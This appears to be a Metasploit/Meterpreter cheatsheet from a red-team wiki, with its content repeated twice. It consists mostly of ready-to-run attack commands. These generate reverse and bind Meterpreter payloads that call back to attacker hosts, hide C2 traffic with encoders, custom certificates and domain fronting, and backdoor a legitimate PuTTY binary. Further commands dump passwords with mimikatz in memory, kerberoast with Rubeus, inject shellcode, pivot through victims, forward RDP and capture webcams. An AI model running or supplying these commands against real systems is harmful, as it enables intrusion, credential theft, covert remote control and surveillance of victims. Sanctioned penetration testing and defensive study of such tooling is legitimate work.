Meterpreter

Last updated 6 months ago

Meterpreter

Cheatsheet

Quick handler launch:

msf > handler -H eth0 -P 443 -p windows/x64/meterpreter/reverse_https [-e x64/xor] [-x]

Bind RC4 payload & handler through SOCKS proxy:

$ msfvenom -p windows/x64/meterpreter/bind_tcp_rc4 RHOST=10.10.13.37 LPORT=443 RC4PASSWORD='Passw0rd!' -f exe -o rev.exe
msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/bind_tcp_rc4
msf exploit(multi/handler) > set RHOST 192.168.1.11
msf exploit(multi/handler) > set LPORT 443
msf exploit(multi/handler) > set RC4PASSWORD Passw0rd!
msf exploit(multi/handler) > set PROXIES socks5:127.0.0.1:1080
msf exploit(multi/handler) > run

Generate a custom SSL certificate for encrypting C2 communications:

$ openssl req -batch -new -newkey rsa:4096 -days 365 -nodes -x509 -keyout cert.key -out cert.crt
$ cat cert.key cert.crt > cert.pem
$ msfvenom -p ... HandlerSSLCert=./cert.pem StagerVerifySSLCert=true ...
msf exploit(multi/handler) > set HandlerSSLCert /home/snovvcrash/cert.pem
msf exploit(multi/handler) > set StagerVerifySSLCert true

auto.rc

// sudo msfconsole -qr auto.rc
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_winhttps
set LHOST 10.10.13.37
set LPORT 443
set EXITFUNC thread
set StageEncoder x64/zutto_dekiru
set EnableStageEncoding true
set HandlerSSLCert /home/snovvcrash/cert.pem
set StagerVerifySSLCert true
set AutoRunScript post/windows/manage/migrate
set ExitOnSession false
exploit -jz

Start SOCKS server (default is SOCKS5):

msf > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf auxiliary(server/socks_proxy) > run -j

Handle connections with domain fronting:

$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=legitimate.com LPORT=443 HttpHostHeader=cdn.provider.net -f exe -o https.exe
msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_https
msf exploit(multi/handler) > set LHOST legitimate.com
msf exploit(multi/handler) > set OverrideLHOST legitimate.com
msf exploit(multi/handler) > set OverrideRequestHost true
msf exploit(multi/handler) > set HttpHostHeader cdn.provider.net
msf exploit(multi/handler) > run

Migrate to a different architecture:

msf > use post/windows/manage/archmigrate
msf post(windows/manage/archmigrate) > set SESSION 1
msf post(windows/manage/archmigrate) > run

meterpreter > transport add -t reverse_tcp -l 10.10.13.37 -p 9002
meterpreter > transport list
msf > handler -H eth0 -P 9002 -p windows/x64/meterpreter/reverse_tcp
meterpreter > transport next

Reverse local port 3389 (on Victim, 192.168.1.11) to local port 43389 (on Attacker):

meterpreter > portfwd add -l 43389 -p 3389 -r 192.168.1.11
[*] Local TCP relay created: :43389 <-> 192.168.1.11:3389
$ xfreerdp /u:administrator /p:'Passw0rd!' /v:127.0.0.1:43389

Routing:

meterpreter > run autoroute -s 192.168.10.0/24
meterpreter > run autoroute -p
Or
msf5 > route add 192.168.10.0/24 1
msf5 > route

Execute binary from memory:

meterpreter > execute -cimH -d calc.exe -f /home/snovvcrash/www/mimikatz.exe -a '"sekurlsa::logonPasswords full" "exit"'

msf > use post/windows/manage/execute_dotnet_assembly
msf post(windows/manage/execute_dotnet_assembly) > set DOTNET_EXE /home/snovvcrash/www/Rubues.exe
msf post(windows/manage/execute_dotnet_assembly) > set ARGUMENTS "kerberoast /usetgtdeleg /format:hashcat"
msf post(windows/manage/execute_dotnet_assembly) > set SESSION 1
msf post(windows/manage/execute_dotnet_assembly) > run

Inject shellcode:

msf > use post/windows/manage/shellcode_inject
msf post(windows/manage/shellcode_inject) > set SHELLCODE /home/snovvcrash/www/shellcode.bin
msf post(windows/manage/shellcode_inject) > set SESSION 1
msf post(windows/manage/shellcode_inject) > run

Backdoored legit executable with delayed Stdapi loading:

$ wget https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe
$ msfvenom -p windows/x64/meterpreter_reverse_http LHOST=eth0 LPORT=8080 EXITFUNC=thread -e x64/xor_dynamic -i 10 -k -x putty.exe -f exe -o evilputty.exe
$ sudo msfconsole -qx 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter_reverse_http; set LHOST eth0; set LPORT 8080; set AutoLoadStdapi false; set EXITFUNC thread; run'
meterpreter > use unhook
meterpreter > load stdapi

Quicky opsec traffic build template:

sudo certbot certonly --standalone -d $DOMAIN --register-unsafely-without-email --agree-tos --key-type rsa
sudo cat /etc/letsencrypt/live/$DOMAIN/{privkey.pem,cert.pem} > /tmp/cert.pem

msfvenom -p windows/x64/meterpreter_reverse_https AutoLoadStdapi='false' AutoSystemInfo='false' HandlerSSLCert='/tmp/cert.pem' HttpCookie='...' HttpReferer='https://www.microsoft.com/en-us/' HttpServerName='nginx' HttpUnknownRequestResponse='...' HttpUserAgent='Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko' StagerVerifySSLCert='true' LHOST='...' LPORT='443' LURI='...' -f raw -o /tmp/met.bin

Get web camera capture:

meterpreter > webcam_list
meterpreter > webcam_snap [-i <CAMERA_ID>]
meterpreter > webcam_stream

Debug

$ gem install pry-byebug
$ vi ~/.pry-byebug

pry-byebug

if defined?(PryByebug)
  Pry.commands.alias_command 'c', 'continue'
  Pry.commands.alias_command 's', 'step'
  Pry.commands.alias_command 'n', 'next'
  Pry.commands.alias_command 'f', 'finish'
end

 # Hit Enter to repeat last command
Pry::Commands.command /^$/, "repeat last command" do
  _pry_.run_command Pry.history.to_a.last
end

$ cp -r /usr/share/metasploit-framework/ /opt
$ vi /opt/metasploit-framework/msfconsole
...add "require 'pry-byebug'"...
$ mkdir -p ~/.msf4/modules/exploits/linux/http/
$ cp /usr/share/metasploit-framework/modules/exploits/linux/http/packageup.rb ~/.msf4/modules/exploits/linux/http/p.rb
$ vi ~/.msf4/modules/exploits/linux/http/p.rb
...add "binding.pry"...

Last updated 6 months ago

Cheatsheet

Quick handler launch:

msf > handler -H eth0 -P 443 -p windows/x64/meterpreter/reverse_https [-e x64/xor] [-x]

Bind RC4 payload & handler through SOCKS proxy:

$ msfvenom -p windows/x64/meterpreter/bind_tcp_rc4 RHOST=10.10.13.37 LPORT=443 RC4PASSWORD='Passw0rd!' -f exe -o rev.exe
msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/bind_tcp_rc4
msf exploit(multi/handler) > set RHOST 192.168.1.11
msf exploit(multi/handler) > set LPORT 443
msf exploit(multi/handler) > set RC4PASSWORD Passw0rd!
msf exploit(multi/handler) > set PROXIES socks5:127.0.0.1:1080
msf exploit(multi/handler) > run

Generate a custom SSL certificate for encrypting C2 communications:

$ openssl req -batch -new -newkey rsa:4096 -days 365 -nodes -x509 -keyout cert.key -out cert.crt
$ cat cert.key cert.crt > cert.pem
$ msfvenom -p ... HandlerSSLCert=./cert.pem StagerVerifySSLCert=true ...
msf exploit(multi/handler) > set HandlerSSLCert /home/snovvcrash/cert.pem
msf exploit(multi/handler) > set StagerVerifySSLCert true

Automation (about exploit flags ):

auto.rc

// sudo msfconsole -qr auto.rc
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_winhttps
set LHOST 10.10.13.37
set LPORT 443
set EXITFUNC thread
set StageEncoder x64/zutto_dekiru
set EnableStageEncoding true
set HandlerSSLCert /home/snovvcrash/cert.pem
set StagerVerifySSLCert true
set AutoRunScript post/windows/manage/migrate
set ExitOnSession false
exploit -jz

Start SOCKS server (default is SOCKS5):

msf > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf auxiliary(server/socks_proxy) > run -j

Handle connections with domain fronting:

$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=legitimate.com LPORT=443 HttpHostHeader=cdn.provider.net -f exe -o https.exe
msf exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_https
msf exploit(multi/handler) > set LHOST legitimate.com
msf exploit(multi/handler) > set OverrideLHOST legitimate.com
msf exploit(multi/handler) > set OverrideRequestHost true
msf exploit(multi/handler) > set HttpHostHeader cdn.provider.net
msf exploit(multi/handler) > run

Migrate to a different architecture:

msf > use post/windows/manage/archmigrate
msf post(windows/manage/archmigrate) > set SESSION 1
msf post(windows/manage/archmigrate) > run

Switch to the next killing current session:

meterpreter > transport add -t reverse_tcp -l 10.10.13.37 -p 9002
meterpreter > transport list
msf > handler -H eth0 -P 9002 -p windows/x64/meterpreter/reverse_tcp
meterpreter > transport next

Reverse local port 3389 (on Victim, 192.168.1.11) to local port 43389 (on Attacker):

meterpreter > portfwd add -l 43389 -p 3389 -r 192.168.1.11
[*] Local TCP relay created: :43389 <-> 192.168.1.11:3389
$ xfreerdp /u:administrator /p:'Passw0rd!' /v:127.0.0.1:43389

Routing:

meterpreter > run autoroute -s 192.168.10.0/24
meterpreter > run autoroute -p
Or
msf5 > route add 192.168.10.0/24 1
msf5 > route

Execute binary from memory:

meterpreter > execute -cimH -d calc.exe -f /home/snovvcrash/www/mimikatz.exe -a '"sekurlsa::logonPasswords full" "exit"'

.NET assembly from memory:

msf > use post/windows/manage/execute_dotnet_assembly
msf post(windows/manage/execute_dotnet_assembly) > set DOTNET_EXE /home/snovvcrash/www/Rubues.exe
msf post(windows/manage/execute_dotnet_assembly) > set ARGUMENTS "kerberoast /usetgtdeleg /format:hashcat"
msf post(windows/manage/execute_dotnet_assembly) > set SESSION 1
msf post(windows/manage/execute_dotnet_assembly) > run

Inject shellcode:

msf > use post/windows/manage/shellcode_inject
msf post(windows/manage/shellcode_inject) > set SHELLCODE /home/snovvcrash/www/shellcode.bin
msf post(windows/manage/shellcode_inject) > set SESSION 1
msf post(windows/manage/shellcode_inject) > run

Backdoored legit executable with delayed Stdapi loading:

$ wget https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe
$ msfvenom -p windows/x64/meterpreter_reverse_http LHOST=eth0 LPORT=8080 EXITFUNC=thread -e x64/xor_dynamic -i 10 -k -x putty.exe -f exe -o evilputty.exe
$ sudo msfconsole -qx 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter_reverse_http; set LHOST eth0; set LPORT 8080; set AutoLoadStdapi false; set EXITFUNC thread; run'
meterpreter > use unhook
meterpreter > load stdapi

Quicky opsec traffic build template:

sudo certbot certonly --standalone -d $DOMAIN --register-unsafely-without-email --agree-tos --key-type rsa
sudo cat /etc/letsencrypt/live/$DOMAIN/{privkey.pem,cert.pem} > /tmp/cert.pem

msfvenom -p windows/x64/meterpreter_reverse_https AutoLoadStdapi='false' AutoSystemInfo='false' HandlerSSLCert='/tmp/cert.pem' HttpCookie='...' HttpReferer='https://www.microsoft.com/en-us/' HttpServerName='nginx' HttpUnknownRequestResponse='...' HttpUserAgent='Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko' StagerVerifySSLCert='true' LHOST='...' LPORT='443' LURI='...' -f raw -o /tmp/met.bin

Get web camera capture:

meterpreter > webcam_list
meterpreter > webcam_snap [-i <CAMERA_ID>]
meterpreter > webcam_stream

Debug

HackTheBox - DropZoneYouTube

$ gem install pry-byebug
$ vi ~/.pry-byebug

pry-byebug

if defined?(PryByebug)
  Pry.commands.alias_command 'c', 'continue'
  Pry.commands.alias_command 's', 'step'
  Pry.commands.alias_command 'n', 'next'
  Pry.commands.alias_command 'f', 'finish'
end

 # Hit Enter to repeat last command
Pry::Commands.command /^$/, "repeat last command" do
  _pry_.run_command Pry.history.to_a.last
end

$ cp -r /usr/share/metasploit-framework/ /opt
$ vi /opt/metasploit-framework/msfconsole
...add "require 'pry-byebug'"...
$ mkdir -p ~/.msf4/modules/exploits/linux/http/
$ cp /usr/share/metasploit-framework/modules/exploits/linux/http/packageup.rb ~/.msf4/modules/exploits/linux/http/p.rb
$ vi ~/.msf4/modules/exploits/linux/http/p.rb
...add "binding.pry"...